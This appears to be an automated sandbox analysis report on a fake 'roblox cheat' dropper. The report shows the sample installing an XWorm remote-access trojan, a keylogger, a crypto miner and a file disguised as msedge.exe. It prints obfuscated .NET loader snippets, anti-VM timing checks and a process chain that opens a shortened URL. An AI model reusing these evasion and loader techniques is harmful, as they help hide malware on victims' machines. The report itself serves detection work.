            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1248829949.0000000000B58000.00000002.00000001.01000000.00000006.sdmp

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Memory
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Memory
            Source: robloxPX1instaler.exe.0.drStatic PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5002515Jump to behavior
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.drStatic PE information: section name: .didat
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.drStatic PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_014E5CC4 push 8B000004h; iretd 0_2_014E5CCE
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_014EB6FF push edi; retn 0000h0_2_014EB701
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B03175 push ecx; ret 2_2_00B03188
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F5166 push rsi; retf 3_2_00007FF6C16F5167
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F5156 push rsi; retf 3_2_00007FF6C16F5157
            Source: Keyloger.exe.3.dr, albqjOvwCQYLvRXxiGyhIpdY44vi5RLlo7VzM72FUP7qbNEq.csHigh entropy of concatenated method names: '_4MOkoXT607b9ZVv18hCOaQeksKQK1QY2Z59Hgn3vnGNBTDWY', 'aoVp1bvo8BQemLHmXPz6S0y0KAL2MZMS1pG20J1rmkO1yH36', 'yAFN5ozhCBuI45z4NTpIpiKfB19pUh9mAx6dQVO83WEQzG9S', '_1ORCLm148GvAasbvzvKe0j3op', 'xz4IVJsbdqQjT3fvrAzMqnpUJ', 'd5IEku84RPpe3jqqxUoOxlid9', 'baJVbebdBRSG0vXeqpQbaFGhF', 'PdROi8GC1qEzGAZ3jL0JM4kS1', '_4vWYxVH7giIuQNZUquEn1HcOH', 'iweLYuR0sjls7DY5DlgNakVEM'
            Source: Keyloger.exe.3.dr, qPFRCBxxevtOrm6kkA6S3T0BVLfQqKPGErYWluL1k515NkyAjTBIKTN89KogayXJPuAweWS9osecqggfc7KqoqU1.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'OvBZh7NuYxNyoawDWVgb1bvQvny4ey9hxzXnZmUKYwMyHV3G', 'D1pK9yah6bW1RSKhi0bojd7k0gErawVt3UAqXVftOOGZ8Ek7', 'Amz2GUO9F3xqCrSqrojRM1z27y3P33TQxbcBuP2jeOuVoQ0I', 'XrVGbup25w9XJj82jHd5OO6JqCynsc4QvmRbz66DPHV276dk'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.csHigh entropy of concatenated method names: 'LjeIsJHhRum59xL', '_6RsfQAJJYyt0J9HkPqIBAQeU380h3KOSQt3dHGv6rcNETpFQfgCb6boQcTnPkAwvsrPG8NTTAwKpmugXZhP', 'zaWTERDp5aT0SDSKgqc0pwq0a7ceYdFVq33bH5rm90KOgrgYcf23ikS2yDHBmgzl4t2KKfhUgFaKblNJ5k3', 'sWVdXUK0j8UTqkeKJ34zN69ydPubFvVaflAAl1XEpkV2r1QsYGAgJphVMO9CuJcZXSLKFk9ZU4EZ9kNpbPz', 'lFKVqnfF4sk3NIn44QcIBHZEg'
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csHigh entropy of concatenated method names: '_0c5jTYhRyonOUDziLx9bjo6xsSexAe', '_25wKNHm120NsmF8qQvTNtHz3RfwaXK', 'viLdoQDOYFFpv6KJ7CRK3qfhhqjyZ8', 'oyu0xUeMkLUDSGAbVhHha949466V1K', 'Vl9igX7Uc5X0UR61FqWGnXY9OhKp3l', '_5AqL7zP7f68dYFzd47NqgQFLffkmOs', 'HrBKo0STAWa5C612O2nnGfOgnFiJTT', 'EZ9n76FqTYmhSSOefwFVuL5ThwtwlO', 'E14zUxLx5YeoVLmDYLzZ6cZw9IN0jq', 'zBGEheUMvhUAXOJ5xyiI8x2n5H3mDM'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csHigh entropy of concatenated method names: '_7YMtWoQN5HfGCSK', 'OkqS6ol8M17XMmP', 'uNW6GrfQGz1M2XM', 'Ii6cHrN7BYLDzEF', '_5aJsNyLDXOhokOb', '_9vn0AlUd8GUTBri', 'JvICn3rRI6iioCk', 'UWKlns5zDZ2WYha', '_7hsyClPI7F56lLF', 'oG7pcy3sU6P1wO9'
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.csHigh entropy of concatenated method names: 'yz3ulHWN9n14oJZA9i5vmrxphpzaCp', 'LT2zntgXTGjsdzj2afFrTKkcoonKiN', 'RVfS3lUZ13RpRJx', '_36yQU5duIkCbW2T', 'xm86z0xRhaJxcNt', 'meydQmflaU7lI44', 'ulkLjOcP0yxW7UI', 'b6Kn4aSdInWG889', 'buvrIstkF8NGBRb', 'YEEc5g9ZTXWiw5i'
            Source: Keyloger.exe.3.dr, 3hMB2la9XyjPtIBDiudYxRNIVlJFvm.csHigh entropy of concatenated method names: 'LfvVtvqV46cUkGAPMYI4VquR3SMv2D', 'vIoAF5cBXshvrNilb2DuPcULPAXNvn', 'kA8SgQYodhg33g9XqJGDIcdyDuU2eq', 'lQv3wZATHx75FgR1TEYl60evq1ah4O', 'PSUdXouR3XnWp7uzoDx9bmHtKpUEQn', 'hianEuAU3qLDiz0mgrS8dJ9EtIpg4FKSm', '_1Uzw1Jv75GWN68eZuqAFXHg859jSuA3VZ', 'Nm7Liat39gbXWFp1qqe6HHX35VDFiL7Da', 'i9EMzetgnoZiy3VF71knEPeukHZBiLL2k', 'jUtPhbUZdmJ9iBO2Yt3x7WmdMEVCHS7NK'
            Source: Keyloger.exe.3.dr, WPBnCaT3d8cYQmg.csHigh entropy of concatenated method names: 'XqbpRmwJ4LtIvAR', 'P0jTCqOar3cv9vv', 'cQ4yWoyO6QI0787', '_9bNc4FZpvPn2d8N', 'tSubarXMNHmpIgk', '_0QpL3D9FsZYYURB', 'e12J0P1bomhydt6', 'a8HR9xsSDvlWrSZ', 'fkNSnoNe84RdGzT', 'De6iaF9HVBWEBkc'
            Source: Keyloger.exe.3.dr, R0AwzNAU4OLQBy5.csHigh entropy of concatenated method names: '_8DVPMgIt5LmyReW', 'BZVAT9UWtB9Y41EBslDUkcaMcEz93wnp4TwFdsJAwNlh5HH3J22aeHQ4iYM26w4Bz', 'xRvMGytdQ2t0vvaBZmUAw8zGZw6lREIjCy8Hi0yW4uNgQnuaYaSOw4QBYq6OZfOm6', 'YZHXocKFTuIAqCnIKSsaOe8Bu7xKEX61eFFh0gCYv1doZqxiACFmQx8wx0U5Tmaxw', 'KseJ4CZxDxgasaIvvghOQYUtjhm1qNwU5KPV4WJnB97il4HcI4MBrgr30GaNE3nxx'
            Source: Keyloger.exe.3.dr, tUULgqwzOy3tsY4.csHigh entropy of concatenated method names: 'XyjKcb0SD0Rnsly', 'onnajoto1IWR83c', '_4JRwDCvuPsxAFxT', 'TUfvtJiSrFTFqfO', 'hKn7O9jilUma2Zw0Est6bw1gkRujD0aPP8Houzr8kpBXX8Is19SryYZ18XrIvaHfPSx1xl3SMjVYx3EGcSp', 'h4RQD1MY3oKURj7ED4KIYRKHKVX617yrfjpvxqbClLGSMVnQNaxibqcg3p41qk3VHfmtekuu5XcduvTUIrL', '_0W2Q7XRDNANGyYK7eYQ1CBoe0T8xbd2SwsQUxdTTxt63ViT6oSnfQrQtDAtoh5P5JHq9VyPg2PLPvvUYpYy', 'qDu4N9S6yNJjuF2IyC1Dipv55nveXbngGs3oU5y97y0gm1zMrkqsSs3csriArDoT7m4uVmnmZE7RcOPNSr2', 'XAGEDgUZ2PI2TXU92O0Frre9DggfBwEZw8SBXJzLTqRAXOPeOXIvKsXXvekl5fCqtfggq9yas1x0W6UAKyW', '_2yOrKM1R5TZHaIoRlmRHTfmfg0sAWQFAnGRUnIyLkL8leSVsnLbKF2mAFPNh8FY82TUpGr5X3XvinrE8GQD'
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeRDTSC instruction interceptor: First address: 8F39F0 second address: 8F3A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeWindow / User API: threadDelayed 1340Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1897
            Source: C:\Users\user\Desktop\roblox cheat.exe TID: 6156Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 2032Thread sleep time: -55827s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 2032Thread sleep time: -55457s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16DB190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16C40BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16EFCA0 FindFirstFileExA,3_2_00007FF6C16EFCA0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E16A4 VirtualQuery,GetSystemInfo,3_2_00007FF6C16E16A4
            Source: C:\Users\user\Desktop\roblox cheat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeThread delayed: delay time: 55827Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeThread delayed: delay time: 55457Jump to behavior
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drBinary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000002.1266710654.00000225ABFD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: robloxPX1instaler.exe, 00000002.00000003.1447851301.0000000001BCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B0E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B0E378
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B2D0F8 mov eax, dword ptr fs:[00000030h]2_2_00B2D0F8
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B243AC mov ecx, dword ptr fs:[00000030h]2_2_00B243AC
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B2D13C mov eax, dword ptr fs:[00000030h]2_2_00B2D13C
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F0D20 GetProcessHeap,3_2_00007FF6C16F0D20
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B02F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00B02F78
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B0E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B0E378
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6C16E3170
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF6C16E2510
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E3354 SetUnhandledExceptionFilter,3_2_00007FF6C16E3354
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16E76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF6C16E76D8
            Source: C:\Users\user\Desktop\roblox cheat.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16DB190
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16F58E0 cpuid 3_2_00007FF6C16F58E0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF6C16DA2CC
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Users\user\Desktop\roblox cheat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00B03495 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00B03495
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C51A4 GetVersionExW,3_2_00007FF6C16C51A4
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
